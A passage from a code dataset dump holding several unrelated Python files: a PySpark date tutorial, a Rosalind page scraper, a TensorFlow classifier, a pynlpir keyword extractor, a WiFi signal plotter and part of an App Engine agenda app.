Language :: Python :: 2.6\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3.5\",\n ]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"13839293","text":"\n# coding: utf-8\n\n# # Dates and Timestamps\n# \n# You will often find yourself working with Time and Date information,\n# let's walk through some ways you can deal with it!\n\nfrom pyspark.sql import SparkSession\nspark = SparkSession.builder.appName(\"dates\").getOrCreate()\n\ndf = spark.read.csv(\"appl_stock.csv\", header=True, inferSchema=True)\n\n\n# Let's walk through how to grab parts of the timestamp data\nfrom pyspark.sql.functions import format_number, dayofmonth, hour, dayofyear, \\\n month, year, weekofyear, date_format\n\n# Extract day of month of timestamp\ndf.select(dayofmonth(df['Date'])).show()\n\n# Extract (..) of timestamp\ndf.select(hour(df['Date'])).show()\n\n# Extract (..) of timestamp\ndf.select(dayofyear(df['Date'])).show()\n\n# Extract (..) of timestamp\ndf.select(month(df['Date'])).show()\n\n\n# So for example, let's say we wanted to know the average closing price per year.\n# Easy! With a groupby and the year() function call:\n\ndf.select(year(df['Date'])).show()\n\n\ndf.withColumn(\"Year\",year(df['Date'])).show()\n\n\nnewdf = df.withColumn(\"Year\",year(df['Date']))\nnewdf.groupBy(\"Year\").mean()[['avg(Year)', 'avg(Close)']].show()\n\n\n# Still not quite presentable! 
Let's use the .alias method as well as round() to clean this up!\n\nresult = newdf.groupBy(\"Year\").mean()[['avg(Year)','avg(Close)']]\nresult = result.withColumnRenamed(\"avg(Year)\", \"Year\")\nresult = result.select('Year',format_number('avg(Close)',2).alias(\"Mean Close\")).show()\n\n\n\n","sub_path":"04_b_data/udemy/pyspark_portilla/1_Spark_DataFrames/5_Dates_and_Timestamps.py","file_name":"5_Dates_and_Timestamps.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"510579204","text":"from bs4 import BeautifulSoup\nimport urllib.request\nimport os\nimport re\n\"\"\"\nYou should run this script from the project root.\nBecause I'm lazy, this script won't create the appropriate folders for you.\nTherefore, ensure that you have the following filestructure:\n$ROOT \n-- website\n -- problems\n\n(The required filestructure may change if the website is updated)\n\"\"\"\n\n\nlist_view = urllib.request.urlopen('http://rosalind.info/problems/list-view/').read()\nlist_view_soup = BeautifulSoup(list_view, \"html.parser\")\n\nfname = 'website/index.html'\nf = open(fname, 'w+')\n\nr = BeautifulSoup(re.sub('/problems/(.*)/', './problems/\\\\1.html', list_view_soup.prettify()), \"html.parser\")\nf.write(r.prettify())\n\naccessible_problems = list_view_soup.find_all(\"a\", class_=\"accessible\")\ninaccessible_problems = list_view_soup.find_all(\"a\", class_=\"not-accessible\")\n\nproblem_links = [p[\"href\"] for p in inaccessible_problems + accessible_problems] # they look like /problems/\n\nproblems = []\nfor link in problem_links:\n source = BeautifulSoup(urllib.request.urlopen(f'http://rosalind.info{link}').read(), \"html.parser\")\n problems.append({ \"link\": link, \"source\": source })\n\nfor p in problems:\n fname = p[\"link\"].split('/')[2] + '.html'\n f = open(f'website/problems/{fname}', 'w+')\n f.write(p[\"source\"].prettify())\n f.close()\n\n","sub_path":"bin/scrape_rosalind.py","file_name":"scrape_rosalind.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"629634099","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport tensorflow as tf\r\nimport sys\r\n\r\n\r\nclass Classifier():\r\n \"\"\"Fully Connected Neural Network that uses stochastic gradient descent to minimize a softmax cross entropy objective function with an Adam optimization routine\r\n\r\n Parameters\r\n ----------\r\n n_features: int\r\n number of features each sample has\r\n n_classes: int\r\n number of unique classes present in target set\r\n eta: float\r\n learning rate\r\n n_epochs: int\r\n number of epochs\r\n random_state: int\r\n seed used for random number generator\r\n build: dict\r\n dictionary specifiying the architecture of the model. n_layers refers to the number of layers, n_units refers to the number of units in each layer and activation_fn refers to the\r\n activation function to be used in each respective layer. 
Note that both n_units and activation_fn must be passed as iterables, and must appear in the desired order of construction\r\n\r\n    \"\"\"\r\n\r\n    def __init__(self, n_features, n_classes, eta=0.01, n_epochs=100, random_state=1, build={'n_layers': 2, 'n_units': [50, 50], 'activation_fn': [tf.nn.relu, tf.nn.relu]}):\r\n\r\n        self.eta = eta\r\n        self.n_epochs = n_epochs\r\n        self.random_state = random_state\r\n\r\n        g = tf.Graph()\r\n\r\n        # the graph is then built using the model's 'build' method\r\n\r\n        with g.as_default():\r\n\r\n            tf.set_random_seed(self.random_state)\r\n\r\n            self.build(n_features, n_classes, build, one_hot=False)\r\n\r\n            self.init_op = tf.global_variables_initializer()\r\n\r\n            self.sess = tf.Session(graph=g)\r\n\r\n    def fc_layer(self, name, input_tensor, n_units, activation_fn=None):\r\n        \"\"\"Function that returns a fully connected node\r\n\r\n        Parameters\r\n        ----------\r\n        name: str\r\n            name to be used for the scope/layer\r\n        input_tensor: tensor-object\r\n            the tensor that is passed into the layer\r\n        n_units: int\r\n            number of units present in layer\r\n        activation_fn: function-object\r\n            activation function to be used for the layer\r\n\r\n        Returns\r\n        -------\r\n        layer: tensor-object\r\n            the function returns the evaluated tensor\r\n\r\n        \"\"\"\r\n\r\n        with tf.variable_scope(name):\r\n\r\n            input_shape = input_tensor.get_shape().as_list()\r\n\r\n            weight_shape = (input_shape[1], n_units)\r\n\r\n            weight = tf.get_variable(name='weight', shape=weight_shape)\r\n            biases = tf.get_variable(name='bias', initializer=tf.zeros(shape=weight_shape[1]))\r\n\r\n            layer = tf.matmul(input_tensor, weight, name='net_input')\r\n            layer = tf.nn.bias_add(layer, biases)\r\n\r\n            if activation_fn is not None:\r\n                return activation_fn(layer)\r\n            else:\r\n                return layer\r\n\r\n    def build(self, n_features, n_classes, build, one_hot):\r\n        \"\"\"Function used to construct the graph. Note that the model uses a softmax cross entropy function as the objective function, and an Adam optimization routine to minimize the\r\n        objective function\r\n\r\n        Parameters\r\n        ----------\r\n        n_features: int\r\n            number of features\r\n        n_classes: int\r\n            number of unique classes present in target set\r\n        build: dict\r\n            dictionary specifying the architecture of the model. n_layers refers to the number of layers, n_units refers to the number of units in each layer and activation_fn refers to the\r\n            activation function to be used in each respective layer. 
Note that both n_units and activation_fn must be passed as iterables, and must appear in the desired order of construction\r\n        one_hot: boolean\r\n            if set to True, the target input is one hot encoded\r\n\r\n        \"\"\"\r\n\r\n        tf_x = tf.placeholder(tf.float32, shape=(\r\n            None, n_features), name='tf_x')\r\n        tf_y = tf.placeholder(tf.int32, shape=(None), name='tf_y')\r\n\r\n        if one_hot:\r\n            tf_y_onehot = tf.one_hot(\r\n                indices=tf_y, depth=n_classes, name='tf_y_onehot')\r\n\r\n        keep_proba = tf.placeholder(tf.float32, name='keep_proba')\r\n\r\n        layers = {'h0': tf_x}\r\n\r\n        for i in range(build['n_layers']):\r\n\r\n            name = 'h{}'.format(i + 1)\r\n\r\n            layers[name] = self.fc_layer(name=name, input_tensor=layers['h{}'.format(\r\n                i)], n_units=build['n_units'][i], activation_fn=build['activation_fn'][i])\r\n\r\n            layers[name] = tf.nn.dropout(layers[name], keep_proba)\r\n\r\n        output = self.fc_layer(\r\n            name='output', input_tensor=layers[name], n_units=n_classes, activation_fn=None)\r\n\r\n        y_pred = {'probabilities': tf.nn.softmax(output, name='probabilities'), 'labels': tf.cast(\r\n            tf.argmax(output, axis=1), tf.int64, name='labels')}\r\n\r\n        correct_predictions = tf.equal(y_pred['labels'], tf.argmax(tf_y, axis=1))\r\n        accuracy = tf.reduce_mean(tf.cast(correct_predictions, tf.float32), name='accuracy')\r\n\r\n        cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(\r\n            logits=output, labels=tf_y), name='cost')\r\n\r\n\r\n        train_op = tf.train.AdamOptimizer(\r\n            learning_rate=self.eta).minimize(cost, name='train_op')\r\n\r\n\r\n    def fit(self, train_set, valid_set=None, batch_size=64):\r\n        \"\"\"Function used to train the model. Note that, for the specific problem the model was built for, the log loss was used as a metric. This is not necessary for the model in general\r\n        and hence can be removed if preferred.\r\n\r\n        Parameters\r\n        ----------\r\n        train_set: tuple\r\n            tuple containing training set in form (data_train, target_train)\r\n        valid_set: tuple\r\n            tuple containing validation set in form (data_validation, target_validation)\r\n        batch_size: int\r\n            size of batches to be used in stochastic gradient descent algorithm\r\n        \"\"\"\r\n\r\n        self.sess.run(self.init_op)\r\n\r\n        self.training_cost, self.validation_cost = [], []\r\n        self.training_accuracy, self.validation_accuracy = [], []\r\n\r\n        if valid_set is None:\r\n            valid_acc = None\r\n\r\n        for epoch in range(1, self.n_epochs + 1):\r\n\r\n            data_batch = self.batch_generator(data=train_set, batch_size=batch_size, shuffle=True)\r\n\r\n            bar = ProgressBar(iter_count=train_set[0].shape[0], batch_size=batch_size)\r\n\r\n            for batch_x, batch_y in data_batch:\r\n\r\n                bar.update()\r\n\r\n                feed = {'tf_x:0': batch_x, 'tf_y:0': batch_y, 'keep_proba:0': 0.5}\r\n\r\n                train_acc, train_cost, _ = self.sess.run(['accuracy:0', 'cost:0', 'train_op'], feed_dict=feed)\r\n\r\n                self.training_cost.append(train_cost)\r\n\r\n                self.training_accuracy.append(train_acc)\r\n\r\n            if valid_set is not None:\r\n\r\n                feed = {'tf_x:0': valid_set[0], 'tf_y:0': valid_set[1], 'keep_proba:0': 1}\r\n\r\n                valid_acc, valid_cost = self.sess.run(['accuracy:0', 'cost:0'], feed_dict=feed)\r\n\r\n                self.validation_cost.append(valid_cost)\r\n                self.validation_accuracy.append(valid_acc)\r\n\r\n            from sklearn.metrics import log_loss\r\n\r\n            loss_feed = {'tf_x:0': train_set[0], 'tf_y:0': train_set[1], 'keep_proba:0': 1}\r\n\r\n            y_pred = self.sess.run(['probabilities:0'], feed_dict=loss_feed)[0]\r\n\r\n            loss = log_loss(y_true=train_set[1], y_pred=y_pred)\r\n\r\n            print('Epoch: {} Avg Train Cost: 
{:.2f} Train Acc: {:.2f} Validation Acc: {:.2f} Error: {:.2f}'.format(epoch, train_cost, train_acc*100, valid_acc*100, loss))\r\n\r\n def batch_generator(self, data, batch_size=64, shuffle=True):\r\n \"\"\"Function used to generate data batches\r\n\r\n Parameters\r\n ----------\r\n data: tuple\r\n tuple of form (data, target)\r\n batch_size: int\r\n number of data elements in each batch\r\n shuffle: boolean\r\n if set to True, the data is shuffled with each new batch\r\n \"\"\"\r\n\r\n X, y = data\r\n\r\n if shuffle:\r\n p = np.random.permutation(y.shape[0])\r\n X, y = X[p], y[p]\r\n\r\n for i in range(0, X.shape[0], batch_size):\r\n\r\n X_batch = X[i: (i + batch_size), :]\r\n y_batch = y[i: (i + batch_size)]\r\n\r\n yield X_batch, y_batch\r\n\r\n\r\n def plot_train(self):\r\n \"\"\"Function used to plot the cost and accuracy (both of the training and validation set)\"\"\"\r\n\r\n from matplotlib import style\r\n\r\n style.use('bmh')\r\n\r\n fig, ax = plt.subplots(nrows=1, ncols=2)\r\n\r\n ax[0].plot(self.training_cost, lw=1, c='r', label='Training Cost')\r\n ax[0].plot(self.validation_cost, lw=1, c='limegreen', label='Validation Cost', ls='--')\r\n ax[0].legend(loc='upper right')\r\n ax[0].set_title('Training Cost')\r\n\r\n ax[1].plot(self.training_accuracy, lw=1, c='r', label='Training Accuracy')\r\n ax[1].plot(self.validation_accuracy, lw=1, c='limegreen', label='Validation Accuracy', ls='--')\r\n ax[1].legend(loc='upper right')\r\n ax[1].set_title('Training Accuracy')\r\n\r\n plt.show()\r\n\r\n\r\nclass ProgressBar():\r\n \"\"\"Custom progress bar that displays the progress of the training as the model iterates through the batches\r\n\r\n Parameters\r\n ----------\r\n data: array-like\r\n data that is used for training; note that this refers to the training data before the batches are generated\r\n bar_length: int\r\n length of progress bar displayed; purely cosmetic\r\n batch_size: int\r\n the number of elements in each batch of data\r\n \"\"\"\r\n\r\n def __init__(self, iter_count, bar_length=45, batch_size=64):\r\n\r\n self.iter_count = iter_count\r\n self.bar_length = bar_length\r\n self.batch_size = batch_size\r\n self.updates = 0\r\n\r\n def update(self):\r\n \"\"\"Function used to update the progress bar; note that this is done in a loop-like construction and the progress bar needs to be updated with each iteration\"\"\"\r\n\r\n end = False\r\n\r\n self.updates += 1\r\n\r\n progress = (self.updates*self.batch_size) / (self.iter_count)\r\n\r\n bars = int(np.floor(self.bar_length*progress))\r\n\r\n if self.updates*self.batch_size < self.iter_count:\r\n str1 = '[{}/{}]'.format(self.updates*self.batch_size, self.iter_count)\r\n str2 = '='*(bars - 1) + '>' + '-'*(self.bar_length - bars)\r\n\r\n else:\r\n str1 = '[{}/{}]'.format(self.iter_count, self.iter_count)\r\n str2 = '='*(self.bar_length - 1) + '>'\r\n end = True\r\n\r\n output = '\\r{}[{}]'.format(str1, str2)\r\n\r\n sys.stdout.write(output)\r\n sys.stdout.flush()\r\n\r\n if end:\r\n print('\\n')\r\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"131532032","text":"#coding=utf-8\n\"\"\"\n file: get_url_word.py\n desc: \n input: file(../data/all_urldoc_cate)\n output:\n name: han\n date: 20160818\n modify:\n\"\"\"\n\nimport sys\n#import thread\nimport json\nimport re\nimport os\nimport time\nfrom multiprocessing.pool import Pool\nfrom multiprocessing import Queue\n#import 
urllib\n#import urlparse\nfrom bs4 import BeautifulSoup\nsys.path.append('..')\nfrom util.util import exec_cmd, search_to_fpath\nimport pynlpir\nfrom collections import OrderedDict\npynlpir.open()\n#reload(sys)\n#sys.setdefaultencoding('UTF8')\n\n\ndef word_by_pynlpir(inputfile, word_dict, max_words=1000):\n\n    weighted_word_list = pynlpir.get_key_words(inputfile, weighted=True, max_words=max_words)\n\n    for word, weight in weighted_word_list:\n        try:\n            word_class = word_to_class(word)\n            if word_class in ['time word', 'numeral', 'adverb', 'verb', \\n                'locative word', 'distinguishing word']: continue\n            if len(word) < 2: continue\n            word_dict.setdefault(word, 0)\n            word_dict[word] += weight\n        except Exception as e:\n            print(\"exception\", e)\n\n\ndef wordclass_by_pynlpir(inputfile, word_dict, max_words=1000):\n\n    weighted_word_list = pynlpir.get_key_words(inputfile, weighted=True, max_words=max_words)\n\n    for word, weight in weighted_word_list:\n        try:\n            word_class = word_to_class(word)\n            if word_class in ['time word', 'numeral', 'adverb', 'verb', \\n                'locative word', 'distinguishing word']: continue\n            if len(word) < 2: continue\n            k = word + \"\\t\" + word_class\n            word_dict.setdefault(k, 0)\n            word_dict[k] += weight\n        except Exception as e:\n            print(e)\n\n\ndef allclass_by_pynlpir(inputfile, word_dict, max_words=1000):\n\n    weighted_word_list = pynlpir.get_key_words(inputfile, weighted=True, max_words=max_words)\n\n    for word, weight in weighted_word_list:\n        try:\n            word_class = word_to_class(word)\n            k = word + \"\\t\" + word_class\n            word_dict.setdefault(k, 0)\n            word_dict[k] += weight\n        except Exception as e:\n            print(e)\n\ndef allword_by_pynlpir(inputfile, word_dict, max_words=1000):\n\n    weighted_word_list = pynlpir.get_key_words(inputfile, weighted=True, max_words=max_words)\n\n    for word, weight in weighted_word_list:\n        try:\n            word_dict.setdefault(word, 0)\n            word_dict[word] += weight\n        except Exception as e:\n            print(e)\n\ndef allword_by_pynlpir_ordered(inputfile, max_words=1000):\n    weighted_word_list = pynlpir.get_key_words(inputfile, weighted=True, max_words=max_words)\n    word_dict = OrderedDict()\n\n    for word, weight in weighted_word_list:\n        try:\n            word_dict.setdefault(word, 0)\n            word_dict[word] += weight\n        except Exception as e:\n            print(e)\n    \n    return word_dict\n\ndef word_to_class(word):\n\n    c = \"null\"\n    c_list = []\n    try:\n        c_list = pynlpir.segment(word)\n    except Exception as e:\n        print(e)\n        return c\n    if len(c_list) >= 1 and c_list[0][1] is not None:\n        c = c_list[-1][1]\n    return c\n\ndef main_to_file(inputfile, outfile, max_words=1000):\n    if os.path.exists(outfile):\n        os.remove(outfile)\n\n    word_dict = {}\n    try:\n        f = open(inputfile,'r').read().decode('utf-8', \"replace\")\n        wordclass_by_pynlpir(f, word_dict, max_words=max_words)\n\n        word_dict = sorted(word_dict.items(), key=lambda d: d[1], reverse=True)\n    except Exception as e:\n        print(e)\n\n    wfd = open(outfile, 'w')\n    for k,w in word_dict:\n        wfd.write(k + \"\\t\" + str(w) + \"\\n\")\n    wfd.close()\n\ndef main(fkey=\"test\", max_words=1000):\n    inputfile = \"../data/doc_\" + fkey\n    outfile = \"../data/word_\" + fkey\n    main_to_file(inputfile, outfile, max_words=max_words)\n\ndef split_main_file(inputfile, outfile, max_words=1000):\n    path = os.path.dirname(inputfile)\n    filename = os.path.basename(inputfile)\n\n    # remove input_part\n    l = search_to_fpath(path, filename)\n    
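# Note (editor's addition): search_to_fpath appears to return every file in\n    # `path` whose name starts with `filename`, including the original input\n    # file and any split parts (e.g. inputfileaa, inputfileab) left over from\n    # a previous run; the original is excluded so only stale parts are removed.\n    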
l.remove(inputfile)\n if len(l) > 0:\n for i in l:\n postfix = i.split(inputfile)[1]\n o = outfile + postfix\n main(i, o, max_words=max_words)\n\ndef split_main(fkey, max_words=1000):\n inputfile = \"../data/doc_\" + fkey\n outfile = \"../data/word_\" + fkey\n split_main_file(inputfile, outfile, max_words=1000)\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"lib/mob_autotag/word.py","file_name":"word.py","file_ext":"py","file_size_in_byte":4666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"227604728","text":"# -*- encoding: utf-8 -*-\n\nclass CommandArguments(object):\n def __init__(self):\n self.value = None\n self.min = None\n self.max = None\n self.name = None\n self.pendingMode = None\n\n\nclass CommandArgument(object):\n\n ARGUMENT_SEPARATOR = \";\"\n KEY_VALUE_SEPARATOR = \"=\"\n\n def __init__(self, name, attributeName, dataType, setterMethod=None):\n self.name = name\n self.attributeName = attributeName\n self.value = None\n self.uninterpretedValue = None\n self.dataType = dataType\n self.setterMethod = setterMethod\n\n\nAVAILABLE_COMMAND_ARGUMENTS = {\n \"value\": CommandArgument(\"value\", None, float, \"setValueWithLimitsAdaptation\"),\n \"min\": CommandArgument(\"min\", None, float, \"setLowerLimit\"),\n \"Min\": CommandArgument(\"Min\", None, float, \"setLowerLimit\"),\n \"max\": CommandArgument(\"max\", None, float, \"setUpperLimit\"),\n \"Max\": CommandArgument(\"Max\", None, float, \"setUpperLimit\"),\n \"name\": CommandArgument(\"name\", \"displayName\", unicode),\n \"Name\": CommandArgument(\"Name\", \"displayName\", unicode),\n \"pending\": CommandArgument(\"pending\", None, None, \"setPendingSendMode\"),\n}","sub_path":"core/commandArgument.py","file_name":"commandArgument.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"359026301","text":"# WifiSignalPlotter.py\n#\tA quick script I've thrown together to get more familiar with Python\n#\tand to check the difference in signal level between two Wifi adaptors\n\n\"\"\" Produces a plot of WiFi strength \"\"\"\n\nimport subprocess\nimport re\nimport time\nimport platform\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nCONST_TIME_INTERVAL = 10\nCONST_NUM_SAMPLES = 100\n\nmeasuringError = 0.0\n\nplt.ion()\n\nfig = plt.figure()\nax = fig.add_subplot(111)\n\nt = time.time()\n\narrayCreation = False\n\ntimes = np.empty(shape=(0))\n\ninterfaceDict = dict()\ninterfaceCount = 0\n\nwhile True:\n\n\tdataArray = []\n\n\tfor a in range(0, CONST_NUM_SAMPLES):\t# x in [beginning, end)\n\n\t\tif platform.system() == 'Linux':\n\t\t\tp = subprocess.Popen(\"iwconfig\", stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\t\telif platform.system() == 'Windows':\n\t\t\tp = subprocess.Popen(\"netsh wlan show interfaces\", stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\t\telse:\n\t\t\traise Exception('reached else of if statement')\n\t\tout = p.stdout.read().decode()\n\n\t\tif platform.system() == 'Linux':\n\t\t\tm = re.findall('(wlan[0-9]+).*?Signal level=(-[0-9]+) dBm', out, re.DOTALL)\n\t\telif platform.system() == 'Windows':\n\t\t\tm = re.findall('Name.*?:.*?([A-z0-9 ]*).*?Signal.*?:.*?([0-9]*)%', out, re.DOTALL)\n\t\telse:\n\t\t\traise Exception('reached else of if statement')\n\n\t\tp.communicate()\n\t\telapsed = time.time() - t\n\n\t\tif type(m) is not list:\n\t\t\traise Exception('not a list')\n\t\tfor mTuple in m:\n\t\t\tif type(mTuple) is not 
tuple:\n\t\t\t\traise Exception('not a tuple')\n\t\t\tif len(mTuple) != 2:\n\t\t\t\traise Exception('number of regex matches not 2')\n\t\t\tif len(mTuple) % 2 != 0: # useful if the regex results for multiple interfaces is in a single tuple\n\t\t\t\traise Exception('number of regex matches not divisible by 2')\n\t\t\tinterfaceName = mTuple[0]\n\t\t\tif interfaceName not in interfaceDict:\n\t\t\t\tinterfaceDict[interfaceName] = interfaceCount\n\t\t\t\tinterfaceCount += 1\n\n\t\tdataArray.append(m)\n\t\ttime.sleep(CONST_TIME_INTERVAL/CONST_NUM_SAMPLES)\n\n\tcounts = np.zeros(len(interfaceDict))\n\n\tsortedData = []\n\tfor i in range(0, len(interfaceDict)):\n\t\tsortedData.append([])\n\n\tif len(sortedData) != interfaceCount:\n\t\traise Exception('data table and number of devices not in agreement')\n\n\tfor dataTuples in dataArray:\n\t\tfor data in dataTuples:\n\t\t\tswitchResult = interfaceDict.get(data[0])\n\t\t\tcurrentCount = counts[switchResult]\n\t\t\tsortedData[switchResult].append(data[1])\n\t\t\tcounts[switchResult] += 1\n\n\n\tnumArray = []\n\tfor i in range(0, len(interfaceDict)):\n\t\tnumArray.append([])\n\n\tindex = 0\n\tfor dataSet in sortedData:\n\t\tfor sdata in dataSet:\n\t\t\tnumArray[index].append(int(sdata))\n\t\tindex += 1\n\n\tif 'avg' not in locals():\n\t\tavg = np.empty(shape=(len(interfaceDict), 0))\n\n\tif 'err' not in locals():\n\t\terr = np.empty(shape=(len(interfaceDict), 0))\n\n\tif platform.system() == 'Linux':\n\t\tmeasuringError = 0.5\n\telif platform.system() == 'Windows':\n\t\tmeasuringError = 0.5\n\telse:\n\t\traise Exception('reached else of if statement')\n\n\tindex = 0\n\tavgCurrent = np.zeros((len(interfaceDict), 1))\n\terrCurrent = np.zeros((len(interfaceDict), 1))\n\tfor numSet in numArray:\n\t\tavgCurrent[index] = np.mean(numSet)\n\t\tcombinedErr = np.sqrt(np.std(numSet)**2 + measuringError**2)\n\t\terrCurrent[index] = combinedErr\n\t\tindex += 1\n\n\tavg = np.append(avg, avgCurrent, axis=1)\n\terr = np.append(err, errCurrent, axis=1)\n\n\ttimes = np.append(times, elapsed)\n\n\tax.clear()\n\tplt.xlabel('Time [s]')\n\tif platform.system() == 'Linux':\n\t\tplt.ylabel('Signal Level [dBm]')\n\telif platform.system() == 'Windows':\n\t\tplt.ylabel('Signal Level [%]')\n\telse:\n\t\t\traise Exception('reached else of if statement')\n\tfor key, value in interfaceDict.items():\n\t\tplt.errorbar(times[:], avg[value, :], yerr=err[value, :], label=key)\n\tplt.legend()\n\tprint('\\n\\n')\n\n\tplt.pause(1)\n","sub_path":"WifiSignalPlotter.py","file_name":"WifiSignalPlotter.py","file_ext":"py","file_size_in_byte":3727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"117761071","text":"#!/usr/bin/env python\n#\n# Copyright 2007 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport webapp2\nimport os.path\nimport datetime\nimport time\nimport logging\nimport random\nimport json\n\nimport webapp2\nimport jinja2\n\nfrom google.appengine.ext import db\nfrom google.appengine.api import users\nfrom 
google.appengine.api import memcache\n\n\njinja_environment = jinja2.Environment(autoescape=True,\n loader=jinja2.FileSystemLoader(os.path.join(os.path.dirname(__file__), 'templates')))\n\n\n\n# -- DATABASE MODELS --\n \nclass Todo(db.Model):\n contents = db.StringProperty()\n \n is_done = db.BooleanProperty(default=False)\n \n \n \nclass Meeting(db.Model):\n name = db.StringProperty()\n \n start_time = db.DateTimeProperty()\n end_time = db.DateTimeProperty()\n \n timestamp = db.DateTimeProperty(auto_now_add=True)\n is_latest = db.BooleanProperty(default=False)\n is_upcoming = db.BooleanProperty(default=True)\n is_someday = db.BooleanProperty(default=False)\n \n todos = db.ListProperty(db.Key) #todos in the particular meeting\n \n \nclass Agenda(db.Model):\n identifier = db.StringProperty()\n name = db.StringProperty()\n notes = db.StringProperty()\n \n timestamp = db.DateTimeProperty(auto_now_add=True)\n \n upcoming_meeting = db.ReferenceProperty(Meeting, collection_name=\"agenda_set_one\")\n someday_meeting = db.ReferenceProperty(Meeting, collection_name=\"agenda_set_two\")\n latest_meeting = db.ReferenceProperty(Meeting, collection_name=\"agenda_set_three\")\n \n meetings = db.ListProperty(db.Key) #meetings in the agenda, including someday\n \n \n# -- UTILITY FUNCTIONS --\n \ndef loadFileFromMemcache(filename):\n data = memcache.get('$file-%s' % filename)\n if data is not None:\n return data\n else:\n contents = []\n f = open(filename, 'r')\n for line in f:\n contents.append(line.strip())\n f.close()\n memcache.add('$file-%s' % filename, contents, 60)\n return contents \n \n \n#Returns a random color_adjective_animal pair as a unique name\ndef getNameHash():\n adjectives = loadFileFromMemcache('adj.new.txt')\n colors = loadFileFromMemcache('colors.new.txt')\n animals = loadFileFromMemcache('animals.new.txt')\n \n adj = adjectives[random.randint(0,len(adjectives)-1)]\n color = colors[random.randint(0,len(colors)-1)]\n animal = animals[random.randint(0,len(animals)-1)]\n \n return color + '_' + adj + '_' + animal\n \n\n# -- REQUEST HANDLERS --\n\nclass AgendaHandler(webapp2.RequestHandler):\n def get(self, agenda_id):\n #returns an agenda HTML for a particular agenda\n #this includes the current meeting, next meeting, someday, and all todos\n # (for security)\n #creates an empty agenda otherwise\n \n if agenda_id is None:\n #redirect to a new agenda\n rand_string = getNameHash()\n self.redirect('/'+rand_string)\n \n #check memcache for a response first\n template_render = memcache.get('$pg-%s' % agenda_id)\n if template_render is not None:\n self.response.out.write(template_render)\n return\n \n #retrieve the agenda, if it doesn't exist then make one\n q = Agenda.all()\n q.filter(\"identifier =\", agenda_id)\n agenda = q.get()\n if agenda is None:\n #create a new empty Agenda and empty Meetings \n agenda = Agenda()\n agenda.identifier = agenda_id\n agenda.name = \"New Meeting\"\n agenda.notes = \"Notes\"\n \n #build a new meeting\n now = datetime.datetime.now() #now rounded to 10 min mark\n now += datetime.timedelta(minutes=5)\n now -= datetime.timedelta(minutes=now.minute % 10) \n then = now + datetime.timedelta(hours=1) \n \n latest_meeting = Meeting()\n latest_meeting.is_upcoming = False\n latest_meeting.is_latest = True\n latest_meeting.start_time = now\n latest_meeting.end_time = then\n latest_meeting.put()\n \n #build an upcoming meeting\n now = datetime.datetime.now() #now rounded to 10 min mark one week from now \n now += datetime.timedelta(minutes=5)\n now -= 
datetime.timedelta(minutes=now.minute % 10) \n then = now + datetime.timedelta(hours=1) \n \n upcoming_meeting = Meeting()\n upcoming_meeting.start_time = now\n upcoming_meeting.end_time = then\n upcoming_meeting.put()\n \n #build a someday meeting\n someday_meeting = Meeting()\n someday_meeting.is_upcoming = False\n someday_meeting.is_someday = True\n someday_meeting.put()\n \n agenda.latest_meeting = latest_meeting\n agenda.upcoming_meeting = upcoming_meeting\n agenda.someday_meeting = someday_meeting\n agenda.put()\n else:\n #get the meeting references\n someday_meeting = agenda.someday_meeting\n upcoming_meeting = agenda.upcoming_meeting\n latest_meeting = agenda.latest_meeting\n \n #build the template\n template_values = {\n \"identifier\": agenda_id,\n }\n \n #render the page and cache it\n template = jinja_environment.get_template('agenda.htm')\n template_render = template.render(template_values)\n memcache.add('$pg-%s' % agenda_id, template_render, 60)\n \n \n self.response.out.write(template_render)\n \n def post(self, agenda_id):\n #provides metadata for an agenda like notes\n if agenda_id is None:\n self.error(500)\n return\n \n #retrieve the agenda\n q = Agenda.all()\n q.filter(\"identifier =\", agenda_id)\n agenda = q.get()\n if agenda is None:\n self.error(500)\n return\n \n name = self.request.get(\"name\", default_value=None)\n if (name is not None):\n agenda.name = name\n \n notes = self.request.get(\"notes\", default_value=None)\n if (notes is not None):\n agenda.notes = notes\n \n new_meeting = self.request.get(\"new_meeting\", default_value=None)\n if (new_meeting is not None):\n #creates a new UPCOMING meeting, and moves the current upcoming meeting to current one\n name = self.request.get(\"meeting_name\", default_value=None)\n if (name is None):\n name = ''\n \n #get current time rounded to 10 min mark one week from now \n now = datetime.datetime.now()\n now += datetime.timedelta(minutes=5)\n now -= datetime.timedelta(minutes=now.minute % 10) \n then = now + datetime.timedelta(hours=1) \n logging.info(now);\n meeting = Meeting()\n meeting.name = name\n meeting.start_time = now\n meeting.end_time = then\n meeting.put()\n \n #flip-flop the meetings and link new one\n agenda.latest_meeting.is_upcoming = False\n agenda.latest_meeting.is_latest = False\n agenda.latest_meeting.put()\n \n agenda.latest_meeting = agenda.upcoming_meeting\n agenda.upcoming_meeting = meeting\n \n agenda.put()\n \n #invalidate the json memcache\n memcache.delete('$ajax-%s' % 